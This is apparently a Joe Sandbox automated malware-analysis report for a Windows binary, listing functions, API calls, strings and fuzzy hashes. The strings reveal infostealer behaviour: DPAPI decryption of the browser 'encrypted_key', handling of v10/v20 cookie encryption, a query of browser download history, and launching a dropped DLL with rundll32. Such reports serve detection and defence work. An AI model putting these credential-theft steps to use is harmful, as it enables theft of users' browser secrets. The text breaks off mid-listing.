Part of subcall function 00D63A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 00D593EE

Part of subcall function 00D591FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,00D5665F,00000000,?), ref: 00D59239

Part of subcall function 00D592A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00D59456), ref: 00D592C9
Part of subcall function 00D592A6: LocalAlloc.KERNEL32(00000040,00D59456,?,?,00D59456,?,00D5DC56,?,?,?,?,?,?), ref: 00D592DD
Part of subcall function 00D592A6: LocalFree.KERNEL32(?,?,?,00D59456,?,00D5DC56,?,?,?,?,?,?), ref: 00D59302

lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 00D5947F

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Strings

_key.txt, xrefs: 00D594A2
, xrefs: 00D5945C
"encrypted_key":", xrefs: 00D593E8
DPAPI, xrefs: 00D59432

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
String ID: $"encrypted_key":"$DPAPI$_key.txt
API String ID: 2040183763-3468172165
Opcode ID: 0b984824e37653ffb07f4f91979451a4daac6c2d537f3f134ab7d128848364f9
Instruction ID: 321726a509c5eaed6daca8020e40453e8dd4cc855d18a43347e97fe10041c838
Opcode Fuzzy Hash: 0b984824e37653ffb07f4f91979451a4daac6c2d537f3f134ab7d128848364f9
Instruction Fuzzy Hash: 80316B36900209EFCF10EBA4DC52ADDB774EF04362F244164FD04A6291DB309E4ACAB4

Function 00D59148 Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
LocalFree.KERNEL32(00D5FCF9,?,?,?,?,00D5F752,?,?,?), ref: 00D591C7
CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 63ff2ba2aac4a6a4d027e10594e6b453bdd9de7fbbed297e6a85dd57b932eb8c
Instruction ID: 46b1fdae697b9afe22456115cf7e38ed76cab1f385a565cd0f16164fa437929f
Opcode Fuzzy Hash: 63ff2ba2aac4a6a4d027e10594e6b453bdd9de7fbbed297e6a85dd57b932eb8c
Instruction Fuzzy Hash: 25118B74900619FFDF219FA4CC4DEAEBBB9FB84741F240509FD41A6160D3308A49EB20

Function 00D645AF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

ShellExecuteEx.SHELL32(?), ref: 00D647D6

Strings

C:\ProgramData\, xrefs: 00D645E2
C:\Windows\system32\rundll32.exe, xrefs: 00D64730
"" , xrefs: 00D6467F
.dll, xrefs: 00D6463A

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 5c1578ef2a4d18666867abd6fd015da74c9762b48eb7c0c225fd45f5fd5d466f
Instruction ID: 2506fa40da62c5469c082e729a47750bfc5b913aef6f680f51f2f06ed3d38609
Opcode Fuzzy Hash: 5c1578ef2a4d18666867abd6fd015da74c9762b48eb7c0c225fd45f5fd5d466f
Instruction Fuzzy Hash: A5719032D446199BCF10FBA5DC43AEDB7B4EF09305F514461AA54B7262DB31AE0A8FB0

Function 00D594DB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D59550
LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 00D59586

Strings

v10, xrefs: 00D59517
v20, xrefs: 00D594F1
ERROR_V128, xrefs: 00D59507

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_V128$v10$v20
API String ID: 52611349-1964637325
Opcode ID: 61f8184bc6f840e4ce55bc82951f23b750d2932e922f699b778b2cbef68ec39e
Instruction ID: ac7c7b3a7cffe77c0bad8a9b37fd8004fc31f8e42e69ecc631800b29ac096629
Opcode Fuzzy Hash: 61f8184bc6f840e4ce55bc82951f23b750d2932e922f699b778b2cbef68ec39e
Instruction Fuzzy Hash: 1231A472A00218EBCF10DF74CC519EE7BA8EB45712F144125FD04E7284EB70DA499BB1

Function 00D733FB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DName::operator+=.LIBCMT ref: 00D734B1

Part of subcall function 00D70D1E: DName::operator=.LIBCMT ref: 00D70D40

DName::DName.LIBCMT ref: 00D7353E
DName::operator+.LIBCMT ref: 00D73545
UnDecorator::getExternalDataType.LIBCMT ref: 00D7355D

Part of subcall function 00D75162: _HeapManager::getMemory.LIBCMT ref: 00D75174
Part of subcall function 00D75162: UnDecorator::getDataType.LIBCMT ref: 00D75195
Part of subcall function 00D75162: UnDecorator::getDataIndirectType.LIBCMT ref: 00D7519E
Part of subcall function 00D75162: DName::operator+=.LIBCMT ref: 00D751B7
Part of subcall function 00D75162: DName::operator+.LIBCMT ref: 00D751C6

Strings

\, xrefs: 00D733FB

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: DataDecorator::getType$Name::operator+Name::operator+=$ExternalHeapIndirectManager::getMemoryNameName::Name::operator=
String ID: \
API String ID: 3772031216-2967466578
Opcode ID: f66b01698f785024ef21f84d503503aaadfb856c276923f93ab4ecb425473b6e
Instruction ID: d94b6f4a8f5804a559c9ecd8eb53145247027fc2e96ea1b77e8e651278bf2253
Opcode Fuzzy Hash: f66b01698f785024ef21f84d503503aaadfb856c276923f93ab4ecb425473b6e
Instruction Fuzzy Hash: DE118E72B046098BEB0DDAA8CC81AFD77B5EB08344F188139E50AD61C4EB28DA05E730

Function 00D60197 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D601AD

Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D804DA
Part of subcall function 00D804C5: __CxxThrowException@8.LIBCMT ref: 00D804EF
Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D80500

std::_Xinvalid_argument.LIBCPMT ref: 00D601CC
_memmove.LIBCMT ref: 00D60208

Strings

string too long, xrefs: 00D601C7
invalid string position, xrefs: 00D601A8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: d115e57bb58f3a7e75be7e740374eeda18ba9c3679d625e13e7530498e7d09c0
Instruction ID: ec089d5ae94f7825b57c4510185d8ebeb6e1de79802324ef138dbab2d04dd609
Opcode Fuzzy Hash: d115e57bb58f3a7e75be7e740374eeda18ba9c3679d625e13e7530498e7d09c0
Instruction Fuzzy Hash: 16115A713407049FDB24EE6CD8D5A1BBBE5EF09710B500A68F596CB682D7B0ED488BB4

Function 00D59ECA Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

lstrlenA.KERNEL32(?), ref: 00D5A0CE
lstrlenA.KERNEL32(?), ref: 00D5A0E9

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Strings

Downloads, xrefs: 00D59EF4
SELECT target_path, tab_url from downloads, xrefs: 00D59FDC
Downloads, xrefs: 00D59F4B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: a6320e4dd6a06e70e1c6de520c3f6cb8c1bc1d76bd4a3752d38580d20b0b881a
Instruction ID: 561cdbf8ab683062120a332a6497dc608b5ce67c42d255aedc2661157ac3b41b
Opcode Fuzzy Hash: a6320e4dd6a06e70e1c6de520c3f6cb8c1bc1d76bd4a3752d38580d20b0b881a
Instruction Fuzzy Hash: 2571AE32984519ABCF00FBA5DD478EEB774EF09306B610421FD40B7162DB21AE1A9FB1

Function 00D6D403 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00D6D450
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D6D488

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: d72473365e72e056cccdc32d04c89a10d9fe7b23a2612bdeaa4af5f8554b4bae
Instruction ID: 523c10fc11d9261a1dfeea00e4c404c69b202ce67a6a7d1eb267fa3fb085288c
Opcode Fuzzy Hash: d72473365e72e056cccdc32d04c89a10d9fe7b23a2612bdeaa4af5f8554b4bae
Instruction Fuzzy Hash: 4F3143F0E04745AFDB309F25AC84A267AE9A715358F548A2EE19786940D730FC848F71

Function 00D76F93 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00D76FA1
_free.LIBCMT ref: 00D76FB4

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: 16b8619587219a67b065f5ee135dd2b3acc793cb7e7505e8ceffd207501d4910
Instruction ID: 18bc6d66478397b09329ca932e968e47d08092d15b04079e1f6cd6f6621ce8a1
Opcode Fuzzy Hash: 16b8619587219a67b065f5ee135dd2b3acc793cb7e7505e8ceffd207501d4910
Instruction Fuzzy Hash: AF119436808A15ABCF326B74FC0565A36A5EF453F0B25C925F84DDA260FA70C84187B1

Function 00D77F99 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00D77FA5

Part of subcall function 00D761D4: __getptd_noexit.LIBCMT ref: 00D761D7
Part of subcall function 00D761D4: __amsg_exit.LIBCMT ref: 00D761E4

__getptd.LIBCMT ref: 00D77FBC
__amsg_exit.LIBCMT ref: 00D77FCA
__lock.LIBCMT ref: 00D77FDA
__updatetlocinfoEx_nolock.LIBCMT ref: 00D77FEE

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 6ecab5820b2bedc5d63485473f399331b9902a8c49d41eb6189c816b08d85793
Instruction ID: 067f18d9f733df17acdf8a9d0a6b6e71d33f16969a22f1709e9877a8d21f132d
Opcode Fuzzy Hash: 6ecab5820b2bedc5d63485473f399331b9902a8c49d41eb6189c816b08d85793
Instruction Fuzzy Hash: CAF0B432A48B109BD720BB78AD0771D7390EF00720F1485A9F80DA76D2FB645944DB76

Function 00D61CBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D61CDE

Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D8048D
Part of subcall function 00D80478: __CxxThrowException@8.LIBCMT ref: 00D804A2
Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D804B3

__EH_prolog3_catch.LIBCMT ref: 00D61D7D
std::_Xinvalid_argument.LIBCPMT ref: 00D61D91

Strings

vector<T> too long, xrefs: 00D61CD9, 00D61D8C

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
